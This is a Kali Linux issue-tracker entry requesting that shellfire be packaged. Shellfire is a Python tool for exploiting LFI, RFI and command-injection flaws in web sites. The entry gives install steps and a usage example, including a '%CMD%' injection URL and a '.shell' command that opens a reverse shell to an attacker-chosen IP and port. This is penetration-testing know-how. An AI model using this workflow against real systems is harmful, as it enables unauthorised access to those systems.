View Issue Details
|ID||Project||Category||View Status||Date Submitted||Last Update|
|0003694||Kali Linux||[All Projects] Queued Tool Addition||public||2016-10-25 22:17||2022-05-31 07:18|
|Target Version||Fixed in Version||2022.3|
|Summary||0003694: shellfire - exploiting LFI,RFI, and command injection vulnerabilities|
|Description||I recently open sourced a tool I developed during OSCP labs: shellfire.|
The tool is used for exploiting LFI,RFI, and command injection vulnerabilities in web sites. It is written in python (to be portable and easy to modify), and contains a wealth of features, including support for SSL/TLS, cookies, POST method, connection upgrade to reverse shell on Linux systems, and an embedded web server to host exploits for RFI.
The purpose of this tool was to create an easy to use alternative to some of the more complex options.
This tool is released with a BSD license to make it super flexible to use.
Source code is available on github: https://github.com/unix-ninja/shellfire
To help speed up the process of evaluating the tool, please make sure to include the following information (the more information you include, the more beneficial it will for us):
- [Name] - The name of the tool
- [Version] - What version of the tool should be added?
--- If it uses source control (such as git), please make sure there is a release to match (e.g. git tag)
- [Homepage] - Where can the tool be found online? Where to go to get more information?
- [Download] - Where to go to get the tool?
- [Author] - Who made the tool?
- [Licence] - How is the software distributed? What conditions does it come with?
- [Description] - What is the tool about? What does it do?
- [Dependencies] - What is needed for the tool to work?
- [Similar tools] - What other tools are out there?
- [How to install] - How do you compile it?
- [How to use] - What are some basic commands/functions to demonstrate it?
BSD 2-clause (do whatever you'd like with it!)
shellfire is an interactive exploitation shell which focuses on exploiting LFI, RFI, and command injection vulnerabilities. The shell is meant to be extremely light-weight with minimal dependencies. All that should be needed is a standard Python 2.7 installed and the Python Requests library.
[How to install]
No compilation is necessary; shellfire is contained in a single Python file. Just mark the file executable and run it:
$ chmod +x shellfire.py
Alternatively, you can just call it using the interpreter directly:
$ python shellfire.py
[How to use]
Once the shell is open, you may enter commands as you would in your regular shell. These commands will be encoded and sent to the target for execution. Any command starting with a dot will be interpreted as an internal command by shellfire and will not be sent to the target.
At any time, you can type ".help" to get information on the internal commands available.
Before exploitation, you need to set the target URL to exploit. Provide shellfire with the exploitable URL, but replace the injection point with "%CMD%". For instance:
>> .url http://example.com/home?dangerous_var=%CMD%
Now you can just run commands as if you had local access:
For Linux machines, shellfire also attempts to automate the process of opening a reverse shell and listener using the ".shell" internal command. After setting the target, do something like the following to open a reverse shell to your machine on port 4444 (192.168.1.10 in this example):
>> .shell 192.168.1.10 4444
shellfire provides several additional internal commands which include setting the HTTP method, setting cookies, changing the UserAgent provided to the remote, setting HTTP auth credentials for password protected pages, automating phpinfo exploitation, etc...
||Could you git tag it's release for v0.4?|
|Sorry about that. I have just tagged release 0.4 on github. You should be able to see that now.|
@kali-team, please could this be packaged up.
@author, If you want to help the packaging process, you can check the documentation here ~ https://www.kali.org/docs/development/public-packaging
Hey @g0tmi1k, sorry for the delay. With cornoavirus it got a bit crazy over here.
I managed to get some time in the past day to look at your documentation. I think I got this right (it builds a package which seems to install fine on the latest Kali). I made a fork on Gitlab for the packaged version (let me know if this was not correct.)
||version 0.4+git20201008-0kali1 is now in kali-rolling.|
|2016-10-25 22:17||unix-ninja||New Issue|
|2018-01-29 15:13||g0tmi1k||Note Added: 0008470|
|2018-01-30 01:45||unix-ninja||Note Added: 0008558|
|2018-01-30 10:17||g0tmi1k||Note Added: 0008568|
|2018-01-30 15:07||unix-ninja||Note Added: 0008583|
|2018-02-21 09:35||g0tmi1k||Product Version||2016.2 =>|
|2020-03-30 14:36||g0tmi1k||Note Added: 0012565|
|2020-03-30 14:36||g0tmi1k||Status||new => acknowledged|
|2020-03-30 14:36||g0tmi1k||Category||New Tool Requests => Queued Tool Addition|
|2020-05-22 15:12||unix-ninja||Note Added: 0012820|
|2020-06-17 14:58||g0tmi1k||Severity||feature => minor|
|2020-12-01 11:12||g0tmi1k||Summary||shellfire => shellfire - exploiting LFI,RFI, and command injection vulnerabilities|
|2022-04-26 14:31||sbrun||Assigned To||=> sbrun|
|2022-04-26 14:31||sbrun||Status||acknowledged => assigned|
|2022-05-04 12:53||g0tmi1k||Status||assigned => acknowledged|
|2022-05-31 07:18||sbrun||Status||acknowledged => resolved|
|2022-05-31 07:18||sbrun||Resolution||open => fixed|
|2022-05-31 07:18||sbrun||Fixed in Version||=> 2022.3|
|2022-05-31 07:18||sbrun||Note Added: 0016224|